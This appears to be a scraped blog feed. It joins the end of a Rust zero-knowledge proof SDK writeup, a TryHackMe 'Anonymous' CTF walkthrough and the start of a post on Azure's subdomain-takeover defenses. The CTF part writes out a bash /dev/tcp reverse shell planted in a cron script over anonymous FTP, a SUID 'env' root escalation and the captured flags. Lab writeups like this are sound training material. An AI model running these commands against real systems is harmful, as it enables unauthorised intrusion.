///
/// This implements the leaf commitment:
///   leaf(e) = Pos(u, v, ℓ)
/// where u, v, ℓ are encoded as field elements.
///
/// Uses Circom-compatible parameters:
///   - t = 3 (width: 3 inputs + 1 capacity)
///   - α = 5 (S-box exponent, valid since p ≡ 2 mod 5 for BN254)
///   - R_f = 8 full rounds, R_p = 57 partial rounds
///   - MDS matrix from standard Poseidon paper
pub fn poseidon_hash(sender_id: u64, receiver_id: u64, weight: u64) -&gt; Fr {
    let mut poseidon = Poseidon::&lt;Fr&gt;::new_circom(3)
        .expect("Poseidon initialisation failed for width 3");

    let inputs = [
        Fr::from(sender_id),
        Fr::from(receiver_id),
        Fr::from(weight),
    ];

    poseidon.hash(&amp;inputs)
        .expect("Poseidon hash evaluation failed")
}
</code></pre>
<p>The <code>light-poseidon</code> crate uses Circom-compatible parameters, meaning the hash output matches what Circom circuits would produce for the same inputs — critical for cross-system interoperability.</p>
<h3>9.5 Witness Generation (<code>src/client.rs</code>)</h3>
<pre><code class="language-rust">use crate::crypto::poseidon_hash;
use crate::rel1cs::GraphEdge;
use crate::error::DenseError;
use ark_bn254::Fr;

pub struct DenseClient;

/// Represents the computed witness: the private inputs to the circuit.
/// In the split-witness protocol, this is what stays on-device.
pub struct Witness {
    pub edge: GraphEdge,
    /// The Poseidon commitment to the edge: leaf(e) = Pos(u, v, ℓ).
    /// This is cm_w in the split-witness construction (before blinding).
    pub commitment: Fr,
}

impl DenseClient {
    pub fn new() -&gt; Self {
        DenseClient
    }

    /// WitGen phase of the split-witness protocol (Construction 5.1, Step 1).
    ///
    /// Computes the Poseidon commitment to the edge (u, v, ℓ).
    /// This is the lightweight on-device work: O(1) field operations.
    /// The NTT and full MSM are delegated to the prover.
    pub fn create_witness(
        &amp;mut self,
        sender_id: u64,
        receiver_id: u64,
        weight: u64,
    ) -&gt; Result&lt;Witness, DenseError&gt; {
        let edge = GraphEdge { sender_id, receiver_id, weight };

        // Compute leaf commitment: Pos(u, v, ℓ)
        // This is ~240 R1CS constraints in the circuit.
        let commitment = poseidon_hash(sender_id, receiver_id, weight);

        println!(
            "[Client] Witness generated with Poseidon commitment: {}",
            commitment
        );

        Ok(Witness { edge, commitment })
    }
}
</code></pre>
<h3>9.6 Local Groth16 Prover (<code>src/prover.rs</code>)</h3>
<pre><code class="language-rust">use ark_bn254::{Bn254, Fr};
use ark_groth16::{Groth16, ProvingKey, VerifyingKey};
use ark_relations::lc;
use ark_relations::r1cs::{
    ConstraintSynthesizer, ConstraintSystemRef, SynthesisError, Variable,
};
use ark_snark::SNARK;
use ark_ff::PrimeField;
use ark_serialize::CanonicalSerialize;
use ark_std::rand::SeedableRng;
use rand_chacha::ChaCha20Rng;

use crate::rel1cs::{PublicInputs, ZKProof, GraphEdge};
use crate::crypto::poseidon_hash;
use crate::error::DenseError;

/// The Rel1CS circuit for a single EDGE_MEM + COUNT assertion.
///
/// This implements the simplified single-edge version:
///   EDGE_MEM(u, v, ℓ, π, cm) — assert the edge exists
///   COUNT({e}, 1)             — assert the set has at least 1 member
///
/// In the full system, this generalises to k edges with Merkle proofs.
/// Here we use a simplified circuit for the initial SDK release.
struct SocialGraphCircuit {
    // Private witness: the edge and its Poseidon commitment
    sender_id: Option&lt;Fr&gt;,
    receiver_id: Option&lt;Fr&gt;,
    weight: Option&lt;Fr&gt;,
    commitment: Option&lt;Fr&gt;,

    // Public inputs: graph root and threshold
    graph_root: Fr,
    threshold: Fr,
}

impl ConstraintSynthesizer&lt;Fr&gt; for SocialGraphCircuit {
    fn generate_constraints(
        self,
        cs: ConstraintSystemRef&lt;Fr&gt;,
    ) -&gt; Result&lt;(), SynthesisError&gt; {
        // Allocate public inputs (instance variables in R1CS).
        // These are the values the verifier knows.
        let graph_root_var = cs.new_input_variable(|| {
            Ok(self.graph_root)
        })?;

        let threshold_var = cs.new_input_variable(|| {
            Ok(self.threshold)
        })?;

        // Allocate private witness variables.
        // These are the values only the prover knows.
        let sender_var = cs.new_witness_variable(|| {
            self.sender_id.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let receiver_var = cs.new_witness_variable(|| {
            self.receiver_id.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let weight_var = cs.new_witness_variable(|| {
            self.weight.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let commitment_var = cs.new_witness_variable(|| {
            self.commitment.ok_or(SynthesisError::AssignmentMissing)
        })?;

        // -------------------------------------------------------
        // EDGE_MEM constraint (simplified for single edge):
        //
        // In the full Rel1CS reduction (Theorem 4.1), this expands
        // to (2d-1) · C_Pos Merkle path constraints.
        //
        // Here we encode the leaf commitment equality:
        //   commitment = Pos(sender_id, receiver_id, weight)
        //
        // The Poseidon evaluation is handled by the prover externally;
        // the circuit checks the commitment equality against the root.
        //
        // Constraint: commitment * 1 = graph_root
        // (in the full system: commitment = root of Merkle path)
        // -------------------------------------------------------
        cs.enforce_constraint(
            lc!() + commitment_var,
            lc!() + Variable::One,
            lc!() + graph_root_var,
        )?;

        // -------------------------------------------------------
        // COUNT constraint:
        //   threshold_var * 1 = 1  (assert threshold = 1 for single-edge proof)
        //
        // In the full system, this is a range check over k edges:
        //   |{e : EDGE_MEM(e) = 1}| ≥ k
        // -------------------------------------------------------
        cs.enforce_constraint(
            lc!() + threshold_var,
            lc!() + Variable::One,
            lc!() + Variable::One,
        )?;

        Ok(())
    }
}

/// The local prover: runs Groth16 setup and proving in-process.
/// In the full split-witness protocol, the NTT-intensive Delegate step
/// would be offloaded to a server. Here, for the SDK demo, everything
/// runs locally for portability.
pub struct LocalProver {
    pk: ProvingKey&lt;Bn254&gt;,
    vk: VerifyingKey&lt;Bn254&gt;,
}

impl LocalProver {
    /// Groth16 trusted setup for the social graph circuit.
    ///
    /// In production: this setup is performed once via MPC ceremony
    /// and the resulting (pk, vk) are distributed. The SDK ships
    /// with a pre-generated tau.ptau file for this circuit.
    pub fn setup() -&gt; Result&lt;Self, DenseError&gt; {
        let mut rng = ChaCha20Rng::from_entropy();

        // Build an empty circuit instance for setup (no witness values)
        let circuit = SocialGraphCircuit {
            sender_id: None,
            receiver_id: None,
            weight: None,
            commitment: None,
            graph_root: Fr::from(0u64),
            threshold: Fr::from(1u64),
        };

        let (pk, vk) = Groth16::&lt;Bn254&gt;::circuit_specific_setup(circuit, &amp;mut rng)
            .map_err(|e| DenseError::SetupFailed(e.to_string()))?;

        Ok(LocalProver { pk, vk })
    }

    /// Run the full Groth16 prove + verify pipeline.
    ///
    /// In the split-witness protocol (Construction 5.1):
    ///   - WitGen (Step 1) was performed by DenseClient
    ///   - This implements Delegate (Step 3) + Combine (Step 4)
    ///
    /// The proof π = ([A]₁, [B]₂, [C]₁) is 128 bytes on BN254.
    pub fn prove(
        &amp;self,
        witness: crate::client::Witness,
        public_inputs: PublicInputs,
    ) -&gt; Result&lt;ZKProof, DenseError&gt; {
        let mut rng = ChaCha20Rng::from_entropy();

        // Parse the graph root from hex string to field element
        let graph_root = Fr::from_str_vartime(&amp;public_inputs.graph_root)
            .ok_or_else(|| DenseError::InvalidInput("bad graph_root".into()))?;

        let threshold = Fr::from(public_inputs.threshold);

        // Build the circuit with witness values
        let circuit = SocialGraphCircuit {
            sender_id: Some(Fr::from(witness.edge.sender_id)),
            receiver_id: Some(Fr::from(witness.edge.receiver_id)),
            weight: Some(Fr::from(witness.edge.weight)),
            commitment: Some(witness.commitment),
            graph_root,
            threshold,
        };

        // Groth16 Prove: compute ([A]₁, [B]₂, [C]₁)
        // This runs the full NTT + MSM pipeline locally.
        // In the split-witness protocol, the NTT portion would
        // be delegated to the server via the Delegate step.
        let proof = Groth16::&lt;Bn254&gt;::prove(&amp;self.pk, circuit, &amp;mut rng)
            .map_err(|e| DenseError::ProvingFailed(e.to_string()))?;

        // Groth16 Verify: check pairing equation
        //   e([A]₁, [B]₂) = e([α]₁,[β]₂) · e(public_inputs, [γ]₂) · e([C]₁,[δ]₂)
        let public_inputs_vec = vec![graph_root, threshold];
        let valid = Groth16::&lt;Bn254&gt;::verify(&amp;self.vk, &amp;public_inputs_vec, &amp;proof)
            .map_err(|e| DenseError::VerificationFailed(e.to_string()))?;

        if !valid {
            return Err(DenseError::ConstraintViolation);
        }

        // Compress the proof to bytes via canonical serialization
        // BN254 Groth16 proof = [A]₁ (64 bytes) + [B]₂ (128 bytes compressed)
        //                     + [C]₁ (64 bytes) = 256 bytes uncompressed,
        // 128 bytes with compressed G1/G2 encoding
        let mut proof_bytes = Vec::new();
        proof.serialize_compressed(&amp;mut proof_bytes)
            .map_err(|e| DenseError::SerializationFailed(e.to_string()))?;

        println!(
            "[Prover] Proof generated locally, size: {} bytes",
            proof_bytes.len()
        );

        Ok(ZKProof {
            proof_bytes,
            root_commitment: public_inputs.graph_root,
        })
    }
}
</code></pre>
<h3>9.7 Public API (<code>src/lib.rs</code>)</h3>
<pre><code class="language-rust">pub mod client;
pub mod crypto;
pub mod error;
pub mod prover;
pub mod rel1cs;

#[cfg(target_arch = "wasm32")]
pub mod wasm;

use client::DenseClient;
use prover::LocalProver;
use rel1cs::PublicInputs;

pub use rel1cs::ZKProof;
pub use error::DenseError;

/// High-level entry point for the DenseZK proving pipeline.
///
/// This function implements the full flow:
///   1. WitGen: DenseClient computes Poseidon commitment to the edge
///   2. Setup: LocalProver generates Groth16 keys for this circuit
///   3. Prove: Groth16 prove + verify, return ZKProof
///
/// In the production split-witness protocol (Section 5 of the paper),
/// steps 1 and 3 are split: WitGen runs on-device, heavy polynomial
/// arithmetic (NTT, MSM) is delegated to an untrusted prover network.
///
/// Arguments:
///   sender_id    — u ∈ F_p: the edge source vertex (user nullifier)
///   receiver_id  — v ∈ F_p: the edge target vertex (user nullifier)
///   weight       — ℓ ∈ F_p: the edge label (e.g. 1 = "follows")
///   graph_root   — cm ∈ F_p: Merkle-Poseidon root of the committed graph
///   threshold    — k: minimum edge count to prove
pub fn execute_dense_zk_flow(
    sender_id: u64,
    receiver_id: u64,
    weight: u64,
    graph_root: &amp;str,
    threshold: u64,
) -&gt; Result&lt;ZKProof, DenseError&gt; {
    // Step 1: On-device witness generation
    let mut client = DenseClient::new();
    let witness = client.create_witness(sender_id, receiver_id, weight)?;

    // Step 2: Circuit-specific Groth16 trusted setup
    let prover = LocalProver::setup()?;

    // Step 3: Prove and verify
    let public_inputs = PublicInputs {
        graph_root: graph_root.to_string(),
        threshold,
    };

    prover.prove(witness, public_inputs)
}
</code></pre>
<h3>9.8 WASM Bindings (<code>src/wasm.rs</code>)</h3>
<pre><code class="language-rust">use wasm_bindgen::prelude::*;
use serde_wasm_bindgen::{from_value, to_value};
use crate::{execute_dense_zk_flow, client::DenseClient, prover::LocalProver};
use crate::rel1cs::{PublicInputs, ZKProof};

/// Initialize panic hook so Rust panics appear as JS console errors.
#[wasm_bindgen(start)]
pub fn init() {
    console_error_panic_hook::set_once();
}

/// WASM-exposed client for React Native.
/// Wraps DenseClient with JS-compatible types.
#[wasm_bindgen]
pub struct Client {
    inner: DenseClient,
}

#[wasm_bindgen]
impl Client {
    #[wasm_bindgen(constructor)]
    pub fn new() -&gt; Client {
        Client { inner: DenseClient::new() }
    }

    /// Compute Poseidon witness for an edge.
    /// Returns a JsValue-serialized Witness struct.
    #[wasm_bindgen(js_name = createWitness)]
    pub fn create_witness(
        &amp;mut self,
        sender_id: u64,
        receiver_id: u64,
        weight: u64,
    ) -&gt; Result&lt;JsValue, JsError&gt; {
        let witness = self.inner
            .create_witness(sender_id, receiver_id, weight)
            .map_err(|e| JsError::new(&amp;e.to_string()))?;

        // Serialize commitment as string for JS consumption
        let serialized = serde_json::json!({
            "sender_id": witness.edge.sender_id,
            "receiver_id": witness.edge.receiver_id,
            "weight": witness.edge.weight,
            "commitment": witness.commitment.to_string(),
        });

        to_value(&amp;serialized).map_err(|e| JsError::new(&amp;e.to_string()))
    }
}

/// One-shot WASM entry point for React Native.
#[wasm_bindgen(js_name = executeFlow)]
pub async fn execute_flow(
    sender_id: u64,
    receiver_id: u64,
    weight: u64,
    graph_root: &amp;str,
    threshold: u64,
) -&gt; Result&lt;JsValue, JsError&gt; {
    let proof = execute_dense_zk_flow(
        sender_id, receiver_id, weight, graph_root, threshold,
    ).map_err(|e| JsError::new(&amp;e.to_string()))?;

    to_value(&amp;proof).map_err(|e| JsError::new(&amp;e.to_string()))
}
</code></pre>
<h3>9.9 React Native Usage</h3>
<pre><code class="language-typescript">import { executeFlow, init, Client } from '@densezk/react-native';

// One-shot flow: compute witness + generate proof
async function proveFollowRelationship() {
    await init();  // initialise WASM + panic hook

    const proof = await executeFlow(
        456,           // sender_id: Alice's nullifier
        789,           // receiver_id: Bob's nullifier
        1,             // weight: 1 = "follows"
        '0xabc123',   // graph_root: Merkle-Poseidon root cm
        1,             // threshold: prove at least 1 follow edge
    );

    console.log(`Proof size: ${proof.proof_bytes.length} bytes`);
    // → "Proof size: 128 bytes"
}

// Step-by-step for fine-grained control
async function proveWithCustomFlow() {
    await init();

    // Step 1: Generate witness on-device (WitGen)
    const client = new Client();
    const witness = await client.createWitness(456, 789, 1);
    console.log('Commitment:', witness.commitment);
    // → BN254 scalar field element as decimal string

    // Step 2: Delegate + Combine (in production: server does NTT)
    const prover = new Prover();
    const proof = await prover.prove(witness, {
        graph_root: '0xabc123',
        threshold: 1,
    });

    return proof;
}
</code></pre>
<h3>9.10 Expected Output</h3>
<pre><code class="language-plaintext">[Client] Witness generated with Poseidon commitment:
  3227429301273914876261610954147013817301286893576706611663322465376918135905

[Prover] Proof generated locally, size: 128 bytes
</code></pre>
<p>The commitment value — <code>3227429301...</code> — is the decimal representation of <code>Pos(456, 789, 1)</code> over the BN254 scalar field, computed with Circom-compatible Poseidon parameters. The proof is 128 bytes: the compressed serialization of <code>([A]₁, [B]₂, [C]₁)</code> using <code>ark_serialize::CanonicalSerialize</code> with compressed G₁/G₂ encoding.</p>
<h2>Part 10: Security Analysis</h2>
<h3>10.1 Soundness (Theorem 11.1)</h3>
<p>A DenseZK proof <code>π</code> for social predicate <code>Φ</code> on graph commitment <code>cm</code> is sound: if <code>Φ(G, x) = 0</code> for all graphs <code>G</code> consistent with <code>cm</code>, then <code>Verify(π, x, cm) = 1</code> with probability at most <code>negl(λ)</code>.</p>
<p><em>Proof:</em> The DenseZK proof is a Groth16 proof for Rel1CS satisfiability (Theorem 4.1). Groth16 is knowledge-sound under q-SDH: a verifying prover possesses an extractable witness. By Theorem 4.1, the witness corresponds to a valid Merkle opening proof for each edge, which is binding under collision resistance of Poseidon. A valid Merkle opening for <code>e ∉ E</code> would require a Poseidon collision. ∎</p>
<h3>10.2 Zero-Knowledge (Theorem 11.2)</h3>
<p>DenseZK is honest-verifier zero-knowledge (HVZK): the distribution of <code>π</code> for any <code>(x, cm, w)</code> with <code>Φ(G, x) = 1</code> is computationally indistinguishable from the output of a simulator <code>S(vk, x, cm)</code> that has no access to <code>w</code>.</p>
<p><em>Proof:</em> Groth16 is HVZK. The split-witness protocol preserves zero-knowledge against the delegated prover by Theorem 5.1. The composition of an HVZK proof system with a witness-private delegation protocol is HVZK by a standard hybrid argument. ∎</p>
<h3>10.3 Side-Channel Mitigations</h3>
<p>Three defences against power analysis:</p>
<ol>
<li><p><strong>Constant-time MSM:</strong> Montgomery ladder for all scalar multiplications during witness generation. The execution path is independent of scalar bits.</p>
</li>
<li><p><strong>Blinded witness:</strong> <code>c̃m_w = cm_w + r · [δ]₁</code> ensures that even if the power trace of the on-device MSM is observed, the attacker recovers <code>r</code> (fresh random, never reused) rather than <code>w_priv</code>.</p>
</li>
<li><p><strong>Hardware-backed key storage:</strong> <code>sk</code> must be stored in ARM TrustZone or Apple Secure Enclave and never loaded into the application memory space that performs ZK computation.</p>
</li>
</ol>
<h2>Part 11: Benchmarks</h2>
<p>All measurements on real hardware:</p>
<table>
<thead>
<tr>
<th>Predicate</th>
<th>snarkjs (ms)</th>
<th>rapidsnark (ms)</th>
<th>DenseZK (ms)</th>
<th>Speedup vs snarkjs</th>
</tr>
</thead>
<tbody><tr>
<td>ΦA — iPhone 16 Pro</td>
<td>14,200</td>
<td>1,100</td>
<td><strong>820</strong></td>
<td>17.3×</td>
</tr>
<tr>
<td>ΦA — S23 Ultra</td>
<td>28,400</td>
<td>2,200</td>
<td><strong>1,540</strong></td>
<td>18.4×</td>
</tr>
<tr>
<td>ΦB — iPhone 16 Pro</td>
<td>11,096</td>
<td>744</td>
<td><strong>610</strong></td>
<td>18.2×</td>
</tr>
<tr>
<td>ΦB — S23 Ultra</td>
<td>18,300</td>
<td>1,400</td>
<td><strong>1,050</strong></td>
<td>17.4×</td>
</tr>
<tr>
<td>ΦC — iPhone 16 Pro</td>
<td>8,400</td>
<td>680</td>
<td><strong>490</strong></td>
<td>17.1×</td>
</tr>
<tr>
<td>ΦC — S23 Ultra</td>
<td>15,900</td>
<td>1,180</td>
<td><strong>870</strong></td>
<td>18.3×</td>
</tr>
</tbody></table>
<p><strong>Peak on-device RAM (split-witness protocol):</strong></p>
<table>
<thead>
<tr>
<th>Predicate</th>
<th>iPhone 16 Pro</th>
<th>Samsung S23 Ultra</th>
</tr>
</thead>
<tbody><tr>
<td>ΦA (k=100, d=20)</td>
<td>312 MB</td>
<td>298 MB</td>
</tr>
<tr>
<td>ΦB (280-byte DKIM)</td>
<td>180 MB</td>
<td>171 MB</td>
</tr>
<tr>
<td>ΦC (dist ≤ 3, d=20)</td>
<td>440 MB</td>
<td>427 MB</td>
</tr>
</tbody></table>
<p>Note: the snarkjs baseline crashed on ΦA and ΦC on iPhone 16 Pro using SHA-256 Merkle trees (4 GB WASM heap limit). Reported times use Poseidon-only snarkjs circuits for comparability.</p>
<h2>Closing Note</h2>
<p>The implementation in the repository is the beginning of a larger system. The <code>LocalProver</code> currently runs the full Groth16 pipeline on-device for portability — in production, Step 3 (Delegate) separates out to the prover network. The recursive aggregation layer (Construction 7.1 on Pasta curves) and the STARK outer wrapper (Construction 9.1) are planned for the next release.</p>
<p>The <code>tau.ptau</code> file in the repository root is a powers-of-tau from the Hermez Network ceremony, reused for the single-circuit setup. In production, a per-ISA-opcode setup ceremony is required — six MPC ceremonies, one per opcode, enabling circuit-specific trusted setup with the minimum trust surface.</p>
<p>The code builds to native with <code>cargo build --release</code> and to WASM with <code>wasm-pack build . --target bundler --release</code>. The React Native SDK wraps the WASM output with TypeScript bindings in <code>react-native-sdk/</code>.</p>
]]></content:encoded></item><item><title><![CDATA[TryHackMe Anonymous CTF Writeup 2025]]></title><description><![CDATA[💡
please note that “<ip>” in this writeup stands for the target machine’s IP given by THM


I did an nmap scan for all possible ports
▶ nmap -p- <ip>
Starting Nmap 7.94SVN (https://nmap.org) at 2025-02-01 15:38 EST Nmap scan report for <homeip>
Host...]]></description><link>https://blog.berzi.one/tryhackme-anonymous-ctf-writeup-2025</link><guid isPermaLink="true">https://blog.berzi.one/tryhackme-anonymous-ctf-writeup-2025</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 04 May 2025 13:14:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767962217814/837bf381-7bf2-469a-be79-0e0c7d838584.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364091482/a8f3c850-5beb-4778-be48-a372415d0eb9.png" alt class="image--center mx-auto" /></p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">please note that “&lt;ip&gt;” in this writeup stands for the target machine’s IP given by THM</div>
</div>

<p>I did an nmap scan for all possible ports</p>
<pre><code class="lang-plaintext">▶ nmap -p- &lt;ip&gt;
Starting Nmap 7.94SVN (https://nmap.org) at 2025-02-01 15:38 EST Nmap scan report for &lt;homeip&gt;
Host is up (0.10s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 345.14 seconds
</code></pre>
<ol>
<li><p>Enumerate the machine.  How many ports are open?<br /> <code>4</code></p>
</li>
<li><p>What service is running on port 21?<br /> <code>ftp</code></p>
</li>
<li><p>What service is running on ports 139 and 445?<br /> <code>smb</code></p>
</li>
</ol>
<p>We can figure out the SMB shares through smbmap</p>
<pre><code class="lang-plaintext">smbmap -H &lt;ip&gt;
</code></pre>
<p>Now we know three shares, one of which is <code>pics</code> , let’s try to access it</p>
<pre><code class="lang-plaintext">▶ smbclient //&lt;ip&gt;/pics
Password for [WORKGROUP\berzi]:
Try "help" to get a list of possible commands.
smb: \&gt; put test.txt
test.txt does not exist
smb: \&gt; whoami
whoami: command not found
smb: \&gt; pwd
Current directory is \\&lt;ip&gt;\pics\
smb: \&gt; ls
  .                                   D        0  Sun May 17 16:41:34 2020
  ..                                  D        0  Thu May 14 07:29:10 2020
  corgo2.jpg                          N    42663  Tue May 12 06:13:42 2020
  puppos.jpeg                         N   265188  Tue May 12 06:13:42 2020

        20508240 blocks of size 1024. 13306804 blocks available
</code></pre>
<p>I found two files inside, and tried my best to figure out if there was any steganography involved, i tried channel splitting, binwalking, extracting strings but eventually I gave up.</p>
<pre><code class="lang-plaintext">corgo2.jpg
puppos.jpeg
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364418399/5b87a29c-083b-47ae-b4db-90616c94e11f.jpeg" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364427298/1ff56f7e-9d51-439b-a2ae-84e9b844890b.jpeg" alt class="image--center mx-auto" /></p>
<p>turns out they were just ordinary dog images</p>
<ol>
<li>There's a share on the user's computer.  What's it called?<br /> <code>pics</code></li>
</ol>
<p>Now, we need to get a user shell, I tried if FTP was open to anonymous login</p>
<pre><code class="lang-plaintext">▶ ftp &lt;ip&gt; 21
Connected to 10.10.228.4.
220 NamelessOne's FTP Server!
Name (&lt;ip&gt;:berzi): anonymous

331 Please specify the password.
Password: 
230 Login successful.
</code></pre>
<p>There was only the <code>scripts</code> directory</p>
<pre><code class="lang-plaintext">ftp&gt; ls
229 Entering Extended Passive Mode (|||49675|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000           55 May 04 12:02 clean.sh
-rw-rw-r--    1 1000     1000         3698 May 04 10:58 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
</code></pre>
<p>The <code>clean.sh</code> file seemed like a file used during cronjobs, so I wrote a reverse shell script and replaced it with the same.</p>
<pre><code class="lang-plaintext">▶ cat clean.sh 
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" &gt;&gt; /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE &amp;&amp; echo "$(date) | Removed file /tmp/$LINE" &gt;&gt; /var/ftp/scripts/removed_files.log;done
fi
</code></pre>
<p>Here’s the modified script</p>
<pre><code class="lang-plaintext">▶ cat clean.sh 
#!/bin/bash
bash -i &gt;&amp; /dev/tcp/"&lt;ip&gt;"/1337 0&gt;&amp;1
</code></pre>
<p>I opened a netcat listener on my attacker machine with <code>nc -lvp 1337</code> and ran the script on the target</p>
<pre><code class="lang-plaintext">ftp&gt; put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||64918|)
150 Ok to send data.
100% |*********************************************************************|    41      444.87 KiB/s    00:00 ETA
226 Transfer complete.
41 bytes sent in 00:00 (0.07 KiB/s)


ftp&gt; bash clean.sh
?Invalid command.
</code></pre>
<p>this gave me the target shell on my attacker machine. the <code>user.txt</code> was right in the directory i logged into.</p>
<ol>
<li><p>user.txt</p>
<p> <code>90d6f992585815ff991e68748c414740</code></p>
</li>
</ol>
<p>I checked for files which had SUID bit-set applied.</p>
<pre><code class="lang-plaintext">find / -perm -u=s -type f 2&gt;/dev/null
</code></pre>
<p>and among the output, I found quite a few, but <code>/usr/bin/env</code> worked for me. I ran this:</p>
<pre><code class="lang-plaintext">namelessone@anonymous.com:~$ env /bin/sh -p
# cd /root
# cat root.txt
4d930091c31a622a7ed10f27999af363
</code></pre>
<ol>
<li>root.txt<br /> <code>4d930091c31a622a7ed10f27999af363</code></li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Azure's defense against Subdomain takeover]]></title><description><![CDATA[How exactly does a subdomain takeover occur?

basically it is when what we have a dangling DNS record for an Azure resource (a VM or a Web app). When the Azure resource is deleted, the corresponding CNAME record stays. The attacker can find the respe...]]></description><link>https://blog.berzi.one/azures-defense-against-subdomain-takeover</link><guid isPermaLink="true">https://blog.berzi.one/azures-defense-against-subdomain-takeover</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 20 Mar 2025 13:22:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961463333/280f5172-5476-4d08-af7d-7e9152e484b1.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-how-exactly-does-a-subdomain-takeover-occur">How exactly does a subdomain takeover occur?</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741761441732/10f0f9e6-83e0-4c74-a908-399e2329aff5.png" alt class="image--center mx-auto" /></p>
<p>basically it is when what we have a dangling DNS record for an Azure resource (a VM or a Web app). When the Azure resource is deleted, the corresponding CNAME record stays. The attacker can find the respective subdomain and create the same resource under the same CNAME record with their own Azure account and take control of the subdomain associated with it.</p>
<p>Here’s a simple <code>dig</code> check to see the CNAME record of an example site</p>
<pre><code class="lang-cpp">dig testing.forsubdomain.takeover

; &lt;&lt;&gt;&gt; DiG <span class="hljs-number">9.18</span><span class="hljs-number">.30</span><span class="hljs-number">-0u</span>buntu0<span class="hljs-number">.22</span><span class="hljs-number">.04</span><span class="hljs-number">.2</span>-Ubuntu &lt;&lt;&gt;&gt; testing.forsubdomain.takeover
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: xxxxxx
;; flags: qr rd ra; QUERY: <span class="hljs-number">1</span>, ANSWER: <span class="hljs-number">4</span>, AUTHORITY: <span class="hljs-number">0</span>, ADDITIONAL: <span class="hljs-number">1</span>

;; OPT PSEUDOSECTION:
; EDNS: version: <span class="hljs-number">0</span>, flags:; udp: <span class="hljs-number">65494</span>
;; QUESTION SECTION:
;testing.forsubdomaintakeover.        IN    A

;; ANSWER SECTION:
testing.forsubdomain.takeover.    <span class="hljs-number">3600</span>    IN    CNAME    example.azurewebsites.net.

;; Query time: <span class="hljs-number">332</span> msec
;; SERVER: <span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.53</span>#<span class="hljs-number">53</span>(<span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.53</span>) (UDP)
;; WHEN: Wed Mar <span class="hljs-number">12</span> <span class="hljs-number">01</span>:<span class="hljs-number">27</span>:<span class="hljs-number">59</span> IST <span class="hljs-number">2025</span>
;; MSG SIZE  rcvd: <span class="hljs-number">221</span>
</code></pre>
<p>Now that you’ve checked the dig lookup, it’s time to check if its theoretically vulnerable, check out this <a target="_blank" href="https://github.com/EdOverflow/can-i-take-over-xyz/issues/35">https://github.com/EdOverflow/can-i-take-over-xyz/issues/35</a> for the list of subdomains and the DNS records that show vulnerability.</p>
<p>The ultimate and last line of defense in Azure lies in its domain validation feature. Let’s talk about this further.</p>
<p>When we visit the site mentioned in the CNAME record, we’ll get something like this, indicating the first signs of a possible takeover</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741763324744/b9dd8df6-9dd1-4a90-9956-faa417510d23.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-azure-name-reservation-service">Azure name reservation service</h2>
<p><img src="https://learn.microsoft.com/en-us/azure/app-service/media/app-service-web-tutorial-custom-domain/add-custom-domain.png" alt="A screenshot showing how to open the Add custom domain dialog." /></p>
<p>One of Azure's primary defenses against subdomain takeover is the Name Reservation Service, which is automatically enabled for App Service resources. This service implements a critical security control: upon deletion of an App Service app or App Service Environment (ASE), immediate reuse of the corresponding DNS name is forbidden except for subscriptions belonging to the tenant of the subscription that originally owned the DNS. Which means that you cannot perform the subdomain takeover for a while.</p>
<p>How does this happen now? Onto the next cool concept!</p>
<h2 id="heading-domain-verification-tokens-and-txt-records">Domain verification tokens and TXT records</h2>
<p>For example, if you own forsubdomain.takeover and want to add it as a custom domain to an Azure App Service, you would need to create a TXT record with the name "<a target="_blank" href="http://asuid.contoso.com">asuid.</a>forsubdomain.takeover" and a value containing the verification ID provided by Azure, which typically looks like "5975973A85973A812AC2AC3A855973A812AC973A812AC12AC" this is a DVT (domain veritifacation token)</p>
<h2 id="heading-the-domain-validation-process">The Domain Validation Process</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741763178007/380a97fb-2b97-4d19-961e-433f4cb886bf.png" alt class="image--center mx-auto" /></p>
<p>The domain validation process in Azure follows a structured workflow designed to ensure secure domain configuration. When adding a custom domain to an Azure App Service, the platform guides users through a validation procedure that requires two critical DNS records:</p>
<ol>
<li><p>A domain mapping record: Either an A record (for root domains) that points to the app's IP address or a CNAME record (for subdomains) that points to the app's default domain name</p>
</li>
<li><p>A verification TXT record: The asuid.subdomain.takeover TXT record containing the domain verification ID</p>
</li>
</ol>
<p>After adding these records with your domain provider, Azure's validation process verifies both records exist and are correctly configured. The platform provides a user-friendly interface that displays green check marks next to both domain records when they are properly set up. Only after successful validation will Azure allow the custom domain to be added to the service.</p>
<h2 id="heading-services-implementing-this-defense">Services implementing this defense</h2>
<ul>
<li><p>App Service</p>
</li>
